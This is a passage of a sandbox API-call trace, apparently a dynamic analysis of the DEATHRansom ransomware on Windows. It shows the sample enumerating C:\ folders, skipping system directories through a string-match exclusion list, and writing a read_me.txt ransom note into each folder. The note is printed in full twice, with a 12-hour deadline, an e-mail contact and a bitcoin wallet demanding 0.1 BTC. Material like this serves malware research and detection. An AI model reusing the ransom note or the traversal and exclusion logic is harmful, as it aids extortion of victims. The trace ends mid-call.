lpFindFileData=0x17e1e8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x17e230, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 1 [0075.098] wnsprintfW (in: pszDest=0x8aa0058, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData") returned 18 [0075.098] lstrcmpW (lpString1="ProgramData", lpString2="..") returned 1 [0075.098] lstrcmpW (lpString1="ProgramData", lpString2=".") returned 1 [0075.098] StrStrW (lpFirst="programdata", lpSrch="programdata") returned="programdata" [0075.098] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x17e1e8 | out: lpFindFileData=0x17e1e8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27cc8060, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27cc8060, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x17e230, cFileName="Recovery", cAlternateFileName="")) returned 1 [0075.098] wnsprintfW (in: pszDest=0x8aa0058, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Recovery") returned 15 [0075.098] lstrcmpW (lpString1="Recovery", lpString2="..") returned 1 [0075.098] lstrcmpW (lpString1="Recovery", lpString2=".") returned 1 [0075.098] StrStrW (lpFirst="recovery", lpSrch="programdata") returned 0x0 [0075.099] StrStrW (lpFirst="recovery", lpSrch="$recycle.bin") returned 0x0 [0075.099] StrStrW (lpFirst="recovery", lpSrch="program files") returned 0x0 [0075.099] StrStrW (lpFirst="recovery", lpSrch="windows") returned 0x0 [0075.099] StrStrW (lpFirst="recovery", lpSrch="all users") returned 0x0 [0075.099] StrStrW (lpFirst="recovery", lpSrch="appdata") returned 0x0 [0075.099] GetProcessHeap () returned 0x4f10000 [0075.099] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8a90050 [0075.100] lstrcpyW (in: lpString1=0x8a90050, lpString2="\\\\?\\C:\\Recovery" | out: lpString1="\\\\?\\C:\\Recovery") returned="\\\\?\\C:\\Recovery" [0075.100] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 31 [0075.100] QueueUserWorkItem (Function=0x40a710, Context=0x8a90050, Flags=0x0) returned 1 [0075.101] GetProcessHeap () returned 0x4f10000 [0075.104] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8a90050 [0075.104] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Recovery\\*") returned 17 [0075.104] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Recovery\\*", lpFindFileData=0x17df70 | out: lpFindFileData=0x17df70*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27cc8060, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27cc8060, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName=".", cAlternateFileName="")) returned 0x7cfe8e8 [0075.105] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Recovery\\.") returned 17 [0075.105] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0075.105] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.105] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x17df70 | out: lpFindFileData=0x17df70*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27cc8060, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27cc8060, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="..", cAlternateFileName="")) returned 1 [0075.105] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Recovery\\..") returned 18 [0075.105] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.105] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x17df70 | out: lpFindFileData=0x17df70*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27c2fae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27c2fae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", cAlternateFileName="E9E239~1")) returned 1 [0075.105] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned 52 [0075.105] lstrcmpW (lpString1="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", lpString2="..") returned 1 [0075.105] lstrcmpW (lpString1="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", lpString2=".") returned 1 [0075.105] StrStrW (lpFirst="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", lpSrch="programdata") returned 0x0 [0075.105] StrStrW (lpFirst="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", lpSrch="$recycle.bin") returned 0x0 [0075.105] StrStrW (lpFirst="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", lpSrch="program files") returned 0x0 [0075.105] StrStrW (lpFirst="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", lpSrch="windows") returned 0x0 [0075.105] StrStrW (lpFirst="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", lpSrch="all users") returned 0x0 [0075.105] StrStrW (lpFirst="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", lpSrch="appdata") returned 0x0 [0075.105] GetProcessHeap () returned 0x4f10000 [0075.105] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ab0060 [0075.107] lstrcpyW (in: lpString1=0x8ab0060, lpString2="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b" | out: lpString1="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b" [0075.107] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 32 [0075.107] QueueUserWorkItem (Function=0x40a710, Context=0x8ab0060, Flags=0x0) returned 1 [0075.150] GetProcessHeap () returned 0x4f10000 [0075.150] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ab0060 [0075.150] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\*") returned 54 [0075.150] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\*", lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27c2fae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27c2fae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe928 [0075.150] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\.") returned 54 [0075.150] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0075.150] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.150] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27c2fae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27c2fae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0075.150] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\..") returned 55 [0075.151] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.151] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0x27c2fae0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27c2fae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x4185decd, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x306000, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="boot.sdi", cAlternateFileName="")) returned 1 [0075.151] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi") returned 61 [0075.151] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0x6496a3c6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x64b0e1b9, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xfa6eb761, ftLastWriteTime.dwHighDateTime=0x1cb88d1, nFileSizeHigh=0x0, nFileSizeLow=0xa160012, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Winre.wim", cAlternateFileName="")) returned 1 [0075.151] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim") returned 62 [0075.151] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0x6496a3c6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x64b0e1b9, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xfa6eb761, ftLastWriteTime.dwHighDateTime=0x1cb88d1, nFileSizeHigh=0x0, nFileSizeLow=0xa160012, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Winre.wim", cAlternateFileName="")) returned 0 [0075.151] FindClose (in: hFindFile=0x7cfe928 | out: hFindFile=0x7cfe928) returned 1 [0075.151] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\read_me.txt") returned 64 [0075.151] CreateFileW (lpFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\read_me.txt" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a8 [0075.151] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.151] WriteFile (in: hFile=0x7a8, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17df5c, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17df5c*=0x6b3, lpOverlapped=0x0) returned 1 [0075.152] CloseHandle (hObject=0x7a8) returned 1 [0075.152] GetProcessHeap () returned 0x4f10000 [0075.152] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ab0060 | out: hHeap=0x4f10000) returned 1 [0075.152] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x17df70 | out: lpFindFileData=0x17df70*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27c2fae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27c2fae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", cAlternateFileName="E9E239~1")) returned 0 [0075.152] FindClose (in: hFindFile=0x7cfe8e8 | out: hFindFile=0x7cfe8e8) returned 1 [0075.152] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Recovery\\read_me.txt") returned 27 [0075.152] CreateFileW (lpFileName="\\\\?\\C:\\Recovery\\read_me.txt" (normalized: "c:\\recovery\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x778 [0075.153] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.153] WriteFile (in: hFile=0x778, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17e1d4, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17e1d4*=0x6b3, lpOverlapped=0x0) returned 1 [0075.153] CloseHandle (hObject=0x778) returned 1 [0075.154] GetProcessHeap () returned 0x4f10000 [0075.154] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8a90050 | out: hHeap=0x4f10000) returned 1 [0075.156] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x17e1e8 | out: lpFindFileData=0x17e1e8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x56231c60, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0xa1602bc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa1602bc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x17e230, cFileName="System Volume Information", cAlternateFileName="SYSTEM~1")) returned 1 [0075.156] wnsprintfW (in: pszDest=0x8aa0058, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\System Volume Information") returned 32 [0075.156] lstrcmpW (lpString1="System Volume Information", lpString2="..") returned 1 [0075.156] lstrcmpW (lpString1="System Volume Information", lpString2=".") returned 1 [0075.156] StrStrW (lpFirst="system volume information", lpSrch="programdata") returned 0x0 [0075.156] StrStrW (lpFirst="system volume information", lpSrch="$recycle.bin") returned 0x0 [0075.156] StrStrW (lpFirst="system volume information", lpSrch="program files") returned 0x0 [0075.156] StrStrW (lpFirst="system volume information", lpSrch="windows") returned 0x0 [0075.156] StrStrW (lpFirst="system volume information", lpSrch="all users") returned 0x0 [0075.156] StrStrW (lpFirst="system volume information", lpSrch="appdata") returned 0x0 [0075.156] GetProcessHeap () returned 0x4f10000 [0075.156] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8a90050 [0075.157] lstrcpyW (in: lpString1=0x8a90050, lpString2="\\\\?\\C:\\System Volume Information" | out: lpString1="\\\\?\\C:\\System Volume Information") returned="\\\\?\\C:\\System Volume Information" [0075.157] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 33 [0075.157] QueueUserWorkItem (Function=0x40a710, Context=0x8a90050, Flags=0x0) returned 1 [0075.157] GetProcessHeap () returned 0x4f10000 [0075.157] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ab0060 [0075.159] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\System Volume Information\\*") returned 34 [0075.159] FindFirstFileW (in: lpFileName="\\\\?\\C:\\System Volume Information\\*", lpFindFileData=0x17df70 | out: lpFindFileData=0x17df70*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27c2fae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27c2fae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", cAlternateFileName="\x07")) returned 0xffffffff [0075.159] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\System Volume Information\\read_me.txt") returned 44 [0075.159] CreateFileW (lpFileName="\\\\?\\C:\\System Volume Information\\read_me.txt" (normalized: "c:\\system volume information\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0075.159] GetProcessHeap () returned 0x4f10000 [0075.159] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ab0060 | out: hHeap=0x4f10000) returned 1 [0075.159] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x17e1e8 | out: lpFindFileData=0x17e1e8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x17e230, cFileName="Users", cAlternateFileName="")) returned 1 [0075.159] wnsprintfW (in: pszDest=0x8aa0058, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users") returned 12 [0075.159] lstrcmpW (lpString1="Users", lpString2="..") returned 1 [0075.159] lstrcmpW (lpString1="Users", lpString2=".") returned 1 [0075.159] StrStrW (lpFirst="users", lpSrch="programdata") returned 0x0 [0075.159] StrStrW (lpFirst="users", lpSrch="$recycle.bin") returned 0x0 [0075.159] StrStrW (lpFirst="users", lpSrch="program files") returned 0x0 [0075.159] StrStrW (lpFirst="users", lpSrch="windows") returned 0x0 [0075.159] StrStrW (lpFirst="users", lpSrch="all users") returned 0x0 [0075.159] StrStrW (lpFirst="users", lpSrch="appdata") returned 0x0 [0075.160] GetProcessHeap () returned 0x4f10000 [0075.160] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ab0060 [0075.160] lstrcpyW (in: lpString1=0x8ab0060, lpString2="\\\\?\\C:\\Users" | out: lpString1="\\\\?\\C:\\Users") returned="\\\\?\\C:\\Users" [0075.160] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 34 [0075.160] QueueUserWorkItem (Function=0x40a710, Context=0x8ab0060, Flags=0x0) returned 1 [0075.160] GetProcessHeap () returned 0x4f10000 [0075.160] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ac0068 [0075.160] wnsprintfW (in: pszDest=0x8ac0068, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\*") returned 14 [0075.160] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\*", lpFindFileData=0x17df70 | out: lpFindFileData=0x17df70*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x24502440, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24502440, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName=".", cAlternateFileName="")) returned 0x7cfe8e8 [0075.160] wnsprintfW (in: pszDest=0x8ac0068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\.") returned 14 [0075.160] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0075.160] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.160] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x17df70 | out: lpFindFileData=0x17df70*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x24502440, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24502440, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="..", cAlternateFileName="")) returned 1 [0075.160] wnsprintfW (in: pszDest=0x8ac0068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\..") returned 15 [0075.160] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.161] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x17df70 | out: lpFindFileData=0x17df70*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 1 [0075.161] wnsprintfW (in: pszDest=0x8ac0068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 33 [0075.161] lstrcmpW (lpString1="5p5NrGJn0jS HALPmcxz", lpString2="..") returned 1 [0075.161] lstrcmpW (lpString1="5p5NrGJn0jS HALPmcxz", lpString2=".") returned 1 [0075.161] StrStrW (lpFirst="5p5nrgjn0js halpmcxz", lpSrch="programdata") returned 0x0 [0075.161] StrStrW (lpFirst="5p5nrgjn0js halpmcxz", lpSrch="$recycle.bin") returned 0x0 [0075.161] StrStrW (lpFirst="5p5nrgjn0js halpmcxz", lpSrch="program files") returned 0x0 [0075.161] StrStrW (lpFirst="5p5nrgjn0js halpmcxz", lpSrch="windows") returned 0x0 [0075.161] StrStrW (lpFirst="5p5nrgjn0js halpmcxz", 